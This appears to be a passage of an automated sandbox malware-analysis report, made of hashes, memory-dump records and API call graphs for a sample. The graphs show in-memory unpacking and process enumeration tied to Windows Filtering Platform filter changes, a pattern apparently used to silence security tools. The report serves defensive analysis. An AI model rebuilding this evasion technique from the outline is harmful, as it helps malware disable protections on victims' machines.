                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
                                                                                                                                                  • Instruction ID: 3ca7d0d8875ffc3bc230cb07fd49bdda0f0d815a1a5e557f6d72fabb1242a7a0
                                                                                                                                                  • Opcode Fuzzy Hash: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
                                                                                                                                                  • Instruction Fuzzy Hash: 8511E1723108008FD75CCF3DCD9A66933D6EB89304B48C2BDE51ACB26ADA358543CB44
                                                                                                                                                  APIs
                                                                                                                                                  • __FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 024E0DBF
                                                                                                                                                    • Part of subcall function 024E3122: __GetUnwindTryBlock.LIBCMT ref: 024E3165
                                                                                                                                                    • Part of subcall function 024E3122: __SetUnwindTryBlock.LIBVCRUNTIME ref: 024E318A
                                                                                                                                                  • Is_bad_exception_allowed.LIBVCRUNTIME ref: 024E0E97
                                                                                                                                                  • __FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 024E10E5
                                                                                                                                                  • std::bad_alloc::bad_alloc.LIBCMT ref: 024E11F2
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                                  • Opcode ID: 108918def01c2ac3d9b7d3d29076d54d19053c4a9c7ba14f76529dd2783086c1
                                                                                                                                                  • Instruction ID: 5b9cd5ed99f01840263ecbf1ea93b09050aa76da7ae2dbb7ee1548dbdd2f1f55
                                                                                                                                                  • Opcode Fuzzy Hash: 108918def01c2ac3d9b7d3d29076d54d19053c4a9c7ba14f76529dd2783086c1
                                                                                                                                                  • Instruction Fuzzy Hash: 58E1B130518B488FEF25EF68C4856AAB7E1FB99315F10165FD48ED7211DB74E882CB82
                                                                                                                                                  APIs
                                                                                                                                                  • Is_bad_exception_allowed.LIBVCRUNTIME ref: 024E13D0
                                                                                                                                                  • std::bad_alloc::bad_alloc.LIBCMT ref: 024E16F9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                  • API String ID: 3523768491-393685449
                                                                                                                                                  • Opcode ID: 44741fef4920e8016cbaa655631b12234c63bd922a043d493a0beaa3d2e65c1f
                                                                                                                                                  • Instruction ID: a91f2fa630f660341febad33e7942883f4fe9179703cf8e8add18c80276bbdfb
                                                                                                                                                  • Opcode Fuzzy Hash: 44741fef4920e8016cbaa655631b12234c63bd922a043d493a0beaa3d2e65c1f
                                                                                                                                                  • Instruction Fuzzy Hash: 0FE1E430518B488FEF25EF29C4856AA77E1FB55315F14066FD49F8B612DB70E882CB82
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AdjustPointer
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1740715915-0
                                                                                                                                                  • Opcode ID: 85d2843c014daff7437528d10741e8f5ff4ca83c870dc17c53e8f2f83a3b4496
                                                                                                                                                  • Instruction ID: 09b64267bcceaad994ea3948a746333a40348a0107aed79c891891cec108293b
                                                                                                                                                  • Opcode Fuzzy Hash: 85d2843c014daff7437528d10741e8f5ff4ca83c870dc17c53e8f2f83a3b4496
                                                                                                                                                  • Instruction Fuzzy Hash: 70C1F530518E0E8FFF29AF288054276B3D1FBA4716B54666FC4ABD7255DBB0D4828BC0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $($2$H$P!`$`
                                                                                                                                                  • API String ID: 0-2682688576
                                                                                                                                                  • Opcode ID: 6f338864bc440f2af10c69bb62dcc2234c63ea6672277518ce2d0b7b3d90242a
                                                                                                                                                  • Instruction ID: 4931aa3d81e8481e476b3141a56b1e77253ef16abaec7d92f9ba14cb3da2952a
                                                                                                                                                  • Opcode Fuzzy Hash: 6f338864bc440f2af10c69bb62dcc2234c63ea6672277518ce2d0b7b3d90242a
                                                                                                                                                  • Instruction Fuzzy Hash: 42C1F4B09187988FD7A4DF18C08879ABBE1FB99304F508A6ED8CDCB215DB705589CF46
                                                                                                                                                  APIs
                                                                                                                                                  • _CallSETranslator.LIBVCRUNTIME ref: 024E1A61
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CallTranslator
                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                  • API String ID: 3163161869-2084237596
                                                                                                                                                  • Opcode ID: 444dbfe9f3f19db82e809d8395c94021d05aa1c46c0babb41f9330434da2b637
                                                                                                                                                  • Instruction ID: 2cf6796adab33fd5ed3bf003f342ed2a605dab0df1d0bd0544f987261279b6cc
                                                                                                                                                  • Opcode Fuzzy Hash: 444dbfe9f3f19db82e809d8395c94021d05aa1c46c0babb41f9330434da2b637
                                                                                                                                                  • Instruction Fuzzy Hash: 66A18130918B488FDF19EF6CC485AA9BBE1FB99305F14465EE44AC7211DB74E981CB81
                                                                                                                                                  APIs
                                                                                                                                                  • __except_validate_context_record.LIBVCRUNTIME ref: 024E0095
                                                                                                                                                  • _IsNonwritableInCurrentImage.LIBCMT ref: 024E012C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                  • String ID: csm
                                                                                                                                                  • API String ID: 3242871069-1018135373
                                                                                                                                                  • Opcode ID: 30ef7e2d36ee2c66795a7b7596056c8c55a2b8efc71cae2e964df3408ffd0b69
                                                                                                                                                  • Instruction ID: 4760056c16719c06dc09bb73f5160a7e4315b8eb7c24717b76800e31830458e9
                                                                                                                                                  • Opcode Fuzzy Hash: 30ef7e2d36ee2c66795a7b7596056c8c55a2b8efc71cae2e964df3408ffd0b69
                                                                                                                                                  • Instruction Fuzzy Hash: A361093060CA088BEF28EE5CD884B7573D1FB54356F00516EE897DB256E7B1EC918B85
                                                                                                                                                  APIs
                                                                                                                                                  • _CallSETranslator.LIBVCRUNTIME ref: 024E17E1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CallTranslator
                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                  • API String ID: 3163161869-2084237596
                                                                                                                                                  • Opcode ID: 6ef9112c19f78de0e2e0f52c9465fb91f3cc3b7f319b326a9b0bcdb3e32a35b8
                                                                                                                                                  • Instruction ID: 2f0370094601366529f893f53aa7e668b801598112b5b13060fc126c9a16dbc4
                                                                                                                                                  • Opcode Fuzzy Hash: 6ef9112c19f78de0e2e0f52c9465fb91f3cc3b7f319b326a9b0bcdb3e32a35b8
                                                                                                                                                  • Instruction Fuzzy Hash: D871B43051CB488FEB69DF58C446BAAB7E0FB99305F144A5ED48EC3211DB74E581CB86
                                                                                                                                                  APIs
                                                                                                                                                  • __except_validate_context_record.LIBVCRUNTIME ref: 024E28A0
                                                                                                                                                  • _CreateFrameInfo.LIBVCRUNTIME ref: 024E28C9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                                                  • String ID: csm
                                                                                                                                                  • API String ID: 2558813199-1018135373
                                                                                                                                                  • Opcode ID: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
                                                                                                                                                  • Instruction ID: 52c33a24baf059f24677adde08a1fbf6697899ff31360b282e6b23c5ce501146
                                                                                                                                                  • Opcode Fuzzy Hash: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
                                                                                                                                                  • Instruction Fuzzy Hash: 005164B0518B458FEB60EF29C48567A77E1FB99352F10155FE48AC7221DB70E842CF86

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:59.2%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                  Total number of Nodes:11
                                                                                                                                                  Total number of Limit Nodes:1
                                                                                                                                                  execution_graph 89 2840650 90 2840665 89->90 95 2840620 VirtualAlloc 90->95 92 28406d0 96 28401b0 VirtualAlloc 92->96 95->92 97 284023b VirtualProtect 96->97 99 2840321 VirtualFree 97->99 102 284030c 97->102 100 2840347 VirtualFree VirtualAlloc 99->100 100->102 101 2840531 102->101 103 28404f9 VirtualProtect 102->103 103->102

                                                                                                                                                  Callgraph

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.3263620250.0000000002840000.00000040.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_2840000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual$AllocFreeProtect
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 267585107-0
                                                                                                                                                  • Opcode ID: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
                                                                                                                                                  • Instruction ID: 7b81c156919496f3fe4b5cd383926a253b67550c4e6849082747074593e73791
                                                                                                                                                  • Opcode Fuzzy Hash: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
                                                                                                                                                  • Instruction Fuzzy Hash: 1FC1CD3421CA488FD788EF5CC498B6AB7E1FB98305F51585DF58AC7261DBB4E881CB42

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 34 2840620-2840644 VirtualAlloc
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.3263620250.0000000002840000.00000040.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_2840000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
                                                                                                                                                  • Instruction ID: 42c62d54d1ca80df244572d2250d49a4e48d2af1a4e11cc88891e319d730dc5d
                                                                                                                                                  • Opcode Fuzzy Hash: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
                                                                                                                                                  • Instruction Fuzzy Hash: C7C08C3060A2004BDB0C6B38D8A9B1B3AE0FB8C300FA0552DF18BC2290C97EC4828786

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:6.5%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                  Signature Coverage:9.3%
                                                                                                                                                  Total number of Nodes:1673
                                                                                                                                                  Total number of Limit Nodes:8
API calls 9067->9068 9068->9073 9070 7ff7757287b4 9069->9070 9069->9088 9072 7ff7757214e2 6 API calls 9070->9072 9071 7ff775728ca5 CloseHandle 9071->9073 9072->9088 9073->8789 9074 7ff77572a1f1 11 API calls 9074->9088 9075 7ff7757288cd OpenProcess 9076 7ff775728a78 GetLastError 9075->9076 9077 7ff7757288ee QueryFullProcessImageNameW 9075->9077 9080 7ff7757214e2 6 API calls 9076->9080 9079 7ff77572892e GetLastError 9077->9079 9077->9088 9078 7ff775728669 Process32Next 9081 7ff77572867d GetLastError 9078->9081 9078->9088 9082 7ff7757214e2 6 API calls 9079->9082 9080->9088 9081->9088 9082->9088 9084 7ff7757214e2 6 API calls 9084->9088 9085 7ff775728a13 CloseHandle 9085->9088 9086 7ff7757286af 9086->9085 9087 7ff7757214e2 6 API calls 9086->9087 9087->9086 9088->9071 9088->9074 9088->9075 9088->9078 9088->9084 9088->9085 9088->9086 9182 7ff775728153 9088->9182 9090 7ff775729bb9 7 API calls 9089->9090 9092 7ff775728d38 9090->9092 9091 7ff775729257 9091->8784 9092->9091 9245 7ff775721cf4 9092->9245 9095 7ff775728d82 9097 7ff775728d8a 9095->9097 9099 7ff775721c73 8 API calls 9095->9099 9097->9091 9098 7ff775728da9 FreeLibrary 9097->9098 9098->9091 9100 7ff775728dc6 9099->9100 9100->9091 9101 7ff775721c73 8 API calls 9100->9101 9102 7ff775728de3 9101->9102 9102->9091 9103 7ff775721c73 8 API calls 9102->9103 9104 7ff775728e00 9103->9104 9104->9091 9105 7ff775721c73 8 API calls 9104->9105 9112 7ff775728e18 9105->9112 9106 7ff77572a1f1 11 API calls 9106->9112 9107 7ff775728ecc strlen 9107->9112 9108 7ff7757214e2 6 API calls 9108->9112 9109 7ff775728f64 GetProcessHeap HeapAlloc 9109->9112 9110 7ff775728fb2 BuildTrusteeWithSidW BuildSecurityDescriptorW 9110->9112 9112->9091 9112->9097 9112->9106 9112->9107 9112->9108 9112->9109 9112->9110 9113 7ff7757291dc LocalFree 9112->9113 9114 7ff7757290f2 GetProcessHeap HeapFree 9112->9114 9261 7ff77572795a GetProcessHeap HeapAlloc 9112->9261 9113->9112 9114->9112 9116 7ff775729bec 9115->9116 9117 7ff775729bd1 9115->9117 9120 7ff7757214e2 
6 API calls 9116->9120 9118 7ff775729c1f 9117->9118 9119 7ff775729bd6 9117->9119 9122 7ff7757214e2 6 API calls 9118->9122 9121 7ff775729c52 9119->9121 9124 7ff775729bdb 9119->9124 9127 7ff775729c15 9120->9127 9123 7ff7757214e2 6 API calls 9121->9123 9122->9127 9123->9127 9125 7ff775729cbc 9124->9125 9128 7ff775729c91 strcmp 9124->9128 9126 7ff775729cc3 9125->9126 9125->9127 9129 7ff7757214e2 6 API calls 9126->9129 9130 7ff7757214e2 6 API calls 9127->9130 9128->9124 9131 7ff775729689 9129->9131 9130->9131 9131->8786 9131->8791 9131->9056 9133 7ff77572a22c 9132->9133 9134 7ff77572a200 9132->9134 9135 7ff7757214e2 6 API calls 9133->9135 9145 7ff77572a0f0 9134->9145 9137 7ff77572a217 9135->9137 9137->9060 9140 7ff77572932b 9138->9140 9141 7ff77572937a 9138->9141 9139 7ff77572934f 9139->9060 9140->9139 9143 7ff7757214e2 6 API calls 9140->9143 9142 7ff7757214e2 6 API calls 9141->9142 9144 7ff77572952d 9142->9144 9143->9139 9146 7ff77572a112 9145->9146 9147 7ff77572a153 9145->9147 9157 7ff775729ed0 9146->9157 9148 7ff7757214e2 6 API calls 9147->9148 9156 7ff77572a12b 9148->9156 9151 7ff77572a183 _errno 9152 7ff775730568 9151->9152 9153 7ff77572a1a5 _errno 9152->9153 9154 7ff77572a1b4 _errno 9153->9154 9153->9156 9155 7ff7757214e2 6 API calls 9154->9155 9155->9156 9156->9137 9158 7ff775729f19 9157->9158 9159 7ff775729ee1 9157->9159 9161 7ff7757214e2 6 API calls 9158->9161 9160 7ff775729bb9 7 API calls 9159->9160 9162 7ff775729ef4 9160->9162 9163 7ff775729ef8 9161->9163 9162->9163 9165 7ff775729d40 9162->9165 9163->9151 9163->9156 9166 7ff775729d58 9165->9166 9167 7ff775729d73 9165->9167 9168 7ff775729d5d 9166->9168 9169 7ff775729da6 9166->9169 9170 7ff7757214e2 6 API calls 9167->9170 9172 7ff775729dd9 9168->9172 9178 7ff775729d62 9168->9178 9171 7ff7757214e2 6 API calls 9169->9171 9177 7ff775729d9c 9170->9177 9171->9177 9173 7ff7757214e2 6 API calls 9172->9173 9173->9177 9174 7ff775729e3b 9176 7ff775729e44 9174->9176 9174->9177 9175 7ff775729e18 strcmp 9175->9178 9179 
7ff7757214e2 6 API calls 9176->9179 9181 7ff7757214e2 6 API calls 9177->9181 9178->9174 9178->9175 9180 7ff775729e69 9179->9180 9180->9163 9181->9180 9205 7ff775728008 GetFileAttributesW 9182->9205 9185 7ff775728192 wcslen 9222 7ff775727102 9185->9222 9188 7ff7757282b9 FwpmFilterAdd0 9192 7ff7757284ce FwpmFilterAdd0 9188->9192 9193 7ff775728461 9188->9193 9189 7ff775728239 FwpmFilterDeleteByKey0 9190 7ff77572825a 9189->9190 9191 7ff775728277 FwpmFilterDeleteByKey0 9189->9191 9196 7ff7757214e2 6 API calls 9190->9196 9197 7ff77572829c 9191->9197 9203 7ff775728182 9191->9203 9194 7ff775728474 9192->9194 9195 7ff775728540 9192->9195 9198 7ff7757214e2 6 API calls 9193->9198 9201 7ff77572848a GetProcessHeap HeapFree 9194->9201 9202 7ff7757284a1 9194->9202 9199 7ff7757214e2 6 API calls 9195->9199 9196->9203 9200 7ff7757214e2 6 API calls 9197->9200 9198->9194 9199->9194 9200->9203 9201->9202 9202->9203 9204 7ff7757284b2 GetProcessHeap HeapFree 9202->9204 9203->9088 9204->9203 9206 7ff775728149 9205->9206 9207 7ff775728028 9205->9207 9228 7ff775727e04 9207->9228 9209 7ff77572803b 9210 7ff77572804f GetProcessHeap HeapAlloc 9209->9210 9220 7ff775728041 9209->9220 9211 7ff7757280d9 9210->9211 9212 7ff775728071 9210->9212 9214 7ff7757214e2 6 API calls 9211->9214 9213 7ff77572807b wcslen GetProcessHeap HeapAlloc 9212->9213 9212->9220 9215 7ff7757280f7 9213->9215 9219 7ff7757280bb 9213->9219 9214->9212 9218 7ff7757214e2 6 API calls 9215->9218 9216 7ff7757280c7 memcpy 9216->9220 9217 7ff77572810f 9217->9220 9221 7ff775728114 GetProcessHeap HeapFree 9217->9221 9218->9219 9219->9216 9219->9217 9220->9185 9220->9203 9221->9220 9223 7ff77572710b 9222->9223 9224 7ff77572711d 9222->9224 9226 7ff775727110 9223->9226 9227 7ff7757214e2 6 API calls 9223->9227 9225 7ff7757214e2 6 API calls 9224->9225 9225->9226 9226->9188 9226->9189 9227->9226 9229 7ff775727e59 9228->9229 9230 7ff775727e6f QueryDosDeviceW 9229->9230 9235 7ff775727e5f 9229->9235 9231 7ff775727e90 GetLastError 9230->9231 9233 
7ff775727f6c 9230->9233 9232 7ff7757214e2 6 API calls 9231->9232 9232->9235 9236 7ff775727de7 9233->9236 9235->9209 9239 7ff77572b270 9236->9239 9240 7ff77572b27e 9239->9240 9241 7ff77572b295 9239->9241 9242 7ff77572dadd fputwc fwprintf _errno 9240->9242 9243 7ff77572dadd fputwc fwprintf _errno 9241->9243 9244 7ff775727dff 9242->9244 9243->9244 9244->9235 9246 7ff775721d2b 9245->9246 9247 7ff775721d02 LoadLibraryA 9245->9247 9248 7ff775721d2e GetLastError 9246->9248 9247->9248 9249 7ff775721d10 9247->9249 9251 7ff7757214e2 6 API calls 9248->9251 9250 7ff7757214e2 6 API calls 9249->9250 9252 7ff775721d29 9250->9252 9251->9252 9252->9095 9253 7ff775721c73 9252->9253 9254 7ff775721c90 GetProcAddress 9253->9254 9255 7ff775721cc1 9253->9255 9256 7ff775721ca1 9254->9256 9257 7ff775721cc6 GetLastError 9254->9257 9255->9257 9258 7ff7757214e2 6 API calls 9256->9258 9259 7ff7757214e2 6 API calls 9257->9259 9260 7ff775721cbf 9258->9260 9259->9260 9260->9095 9262 7ff775727c4f 9261->9262 9263 7ff7757279a1 9261->9263 9264 7ff7757214e2 6 API calls 9262->9264 9265 7ff775727102 6 API calls 9263->9265 9277 7ff775727c3b 9264->9277 9266 7ff7757279b1 9265->9266 9267 7ff775727c6c FwpmFilterDeleteByKey0 9266->9267 9268 7ff775727a46 9266->9268 9269 7ff775727ca7 FwpmFilterDeleteByKey0 9267->9269 9270 7ff775727c8d 9267->9270 9271 7ff775727b20 FwpmFilterAdd0 9268->9271 9273 7ff775727cd2 9269->9273 9269->9277 9272 7ff7757214e2 6 API calls 9270->9272 9275 7ff775727c07 9271->9275 9276 7ff775727cef FwpmFilterAdd0 9271->9276 9272->9277 9274 7ff7757214e2 6 API calls 9273->9274 9274->9277 9278 7ff7757214e2 6 API calls 9275->9278 9279 7ff775727d5d 9276->9279 9277->9112 9280 7ff775727c1a 9278->9280 9281 7ff7757214e2 6 API calls 9279->9281 9280->9277 9282 7ff775727c24 GetProcessHeap HeapFree 9280->9282 9283 7ff775727d7a 9281->9283 9282->9277 9341 7ff775730701 FindClose 10066 7ff77572c600 10067 7ff77572c616 10066->10067 10072 7ff77572c1ae 10067->10072 10069 7ff77572ca67 10070 7ff77572b3e7 fputc 10071 
7ff77572c382 10070->10071 10071->10069 10071->10070 10073 7ff77572c1c0 10072->10073 10074 7ff77572b2d0 6 API calls 10073->10074 10075 7ff77572c1f8 10074->10075 10076 7ff77572c20d 10075->10076 10077 7ff77572c21f 10075->10077 10078 7ff77572b5da fputc 10076->10078 10079 7ff77572c290 10077->10079 10082 7ff77572c235 10077->10082 10087 7ff77572c21a 10078->10087 10080 7ff77572c29b strlen 10079->10080 10081 7ff77572c294 10079->10081 10080->10081 10085 7ff77572c08a 11 API calls 10081->10085 10083 7ff77572c239 10082->10083 10084 7ff77572c241 strlen 10082->10084 10086 7ff77572b721 11 API calls 10083->10086 10084->10083 10085->10087 10088 7ff77572c274 10086->10088 10087->10071 10088->10087 10089 7ff77572b3e7 fputc 10088->10089 10089->10088 11057 7ff775721001 11059 7ff77572103c __set_app_type 11057->11059 11060 7ff7757210a9 11059->11060 10596 7ff77572ad0e 10597 7ff77572ad13 signal 10596->10597 10598 7ff77572ad25 signal 10597->10598 10599 7ff77572aca1 10597->10599 10598->10599 11061 7ff77572dc0b 11062 7ff77572ccd9 2 API calls 11061->11062 11066 7ff77572db86 11062->11066 11063 7ff77572e2e0 11064 7ff77572e301 11063->11064 11065 7ff77572ccd9 2 API calls 11063->11065 11065->11064 11066->11063 11067 7ff77572ccd9 fputwc fwprintf 11066->11067 11067->11066 11071 7ff77572131a 11072 7ff775721131 152 API calls 11071->11072 11073 7ff77572132e 11072->11073 9366 7ff775721a19 9367 7ff775721b02 9366->9367 9368 7ff775721a32 9366->9368 9369 7ff7757214e2 6 API calls 9367->9369 9370 7ff775721a3b FindResourceA 9368->9370 9371 7ff775721b2d 9368->9371 9375 7ff775721af2 9369->9375 9373 7ff775721b58 GetLastError 9370->9373 9374 7ff775721a58 LoadResource 9370->9374 9372 7ff7757214e2 6 API calls 9371->9372 9372->9375 9376 7ff7757214e2 6 API calls 9373->9376 9377 7ff775721a70 9374->9377 9378 7ff775721b86 GetLastError GetLastError 9374->9378 9379 7ff775721b79 9376->9379 9381 7ff7757214e2 6 API calls 9377->9381 9380 7ff7757214e2 6 API calls 9378->9380 9379->9375 9379->9378 9380->9375 9381->9375 10600 
7ff77572341c 10601 7ff77572342e GetExitCodeProcess 10600->10601 10602 7ff7757234ad 10600->10602 10604 7ff77572350f GetLastError 10601->10604 10605 7ff775723444 10601->10605 10603 7ff7757214e2 6 API calls 10602->10603 10617 7ff7757234d6 10603->10617 10606 7ff7757214e2 6 API calls 10604->10606 10607 7ff775723452 WaitForSingleObject GetExitCodeProcess 10605->10607 10612 7ff7757235f9 TerminateProcess 10605->10612 10605->10617 10606->10617 10608 7ff7757236f1 GetLastError 10607->10608 10609 7ff775723476 10607->10609 10613 7ff7757214e2 6 API calls 10608->10613 10622 7ff7757233c0 10609->10622 10611 7ff7757237ac 10612->10607 10616 7ff77572360a GetLastError 10612->10616 10613->10617 10615 7ff7757214e2 6 API calls 10619 7ff7757234ab 10615->10619 10620 7ff7757214e2 6 API calls 10616->10620 10617->10611 10617->10615 10618 7ff775723484 10621 7ff7757214e2 6 API calls 10618->10621 10620->10605 10621->10619 10623 7ff7757233ec 10622->10623 10624 7ff7757233ce CloseHandle CloseHandle 10622->10624 10626 7ff7757214e2 6 API calls 10623->10626 10625 7ff7757233e5 10624->10625 10625->10617 10625->10618 10626->10625 10627 7ff77572181b 10628 7ff7757217b9 10627->10628 10629 7ff7757214e2 6 API calls 10628->10629 10630 7ff7757217d6 10629->10630 10103 7ff77572c51b 10104 7ff77572c52d 10103->10104 10109 7ff77572bbb4 10104->10109 10106 7ff77572ca67 10107 7ff77572c382 10107->10106 10108 7ff77572b3e7 fputc 10107->10108 10108->10107 10112 7ff77572bbe6 10109->10112 10110 7ff77572bd06 10111 7ff77572bd86 10110->10111 10113 7ff77572b3e7 fputc 10110->10113 10114 7ff77572bda2 10111->10114 10115 7ff77572b3e7 fputc 10111->10115 10112->10110 10116 7ff77572b3e7 fputc 10112->10116 10113->10110 10114->10107 10115->10111 10116->10112 11083 7ff775730721 DeleteCriticalSection 9382 7ff77572e222 9386 7ff77572db86 9382->9386 9383 7ff77572e2e0 9384 7ff77572e301 9383->9384 9388 7ff77572ccd9 9383->9388 9386->9383 9387 7ff77572ccd9 fputwc fwprintf 9386->9387 9387->9386 9389 7ff77572ccf1 9388->9389 9390 7ff77572cd06 
9389->9390 9391 7ff77572cd53 9389->9391 9393 7ff77572cd2a fwprintf 9390->9393 9394 7ff77572cd31 9390->9394 9392 7ff77572cd58 9391->9392 9399 7ff77572ca90 9391->9399 9396 7ff77572cdab 9392->9396 9397 7ff77572ca90 fputwc 9392->9397 9393->9394 9394->9384 9396->9394 9398 7ff77572ca90 fputwc 9396->9398 9397->9392 9398->9396 9400 7ff77572caa1 9399->9400 9401 7ff77572cabc 9400->9401 9402 7ff77572cab2 fputwc 9400->9402 9401->9391 9402->9401 9403 7ff775723222 9404 7ff77572325c 9403->9404 9405 7ff775723230 WaitForSingleObject 9403->9405 9407 7ff7757214e2 6 API calls 9404->9407 9406 7ff77572328c GetLastError 9405->9406 9409 7ff775723240 9405->9409 9408 7ff7757214e2 6 API calls 9406->9408 9407->9409 9408->9409 11087 7ff77572ff1f GetModuleHandleW GetProcAddress 11088 7ff77572ff4c LoadLibraryW GetProcAddress 11087->11088 11089 7ff77572ff73 11087->11089 11088->11089 9410 7ff77572f626 9411 7ff77572f65d 9410->9411 9412 7ff77572f63b DeleteCriticalSection 9410->9412 9412->9411 10123 7ff775725923 10124 7ff7757259d4 10123->10124 10125 7ff775725936 10123->10125 10128 7ff7757214e2 6 API calls 10124->10128 10126 7ff77572593f CreateFileA 10125->10126 10127 7ff775725a04 10125->10127 10129 7ff77572597c GetFileSize 10126->10129 10130 7ff775725a34 GetLastError 10126->10130 10131 7ff7757214e2 6 API calls 10127->10131 10134 7ff7757259b4 10128->10134 10132 7ff775725afa GetLastError 10129->10132 10135 7ff77572599b 10129->10135 10130->10135 10131->10134 10132->10135 10133 7ff7757259ab CloseHandle 10133->10134 10135->10133 10135->10134 10645 7ff77572ac27 10646 7ff77572ac4e 10645->10646 10647 7ff77572acdf signal 10646->10647 10649 7ff77572ac6f 10646->10649 10650 7ff77572acb5 10646->10650 10647->10649 10647->10650 10648 7ff77572acfb signal 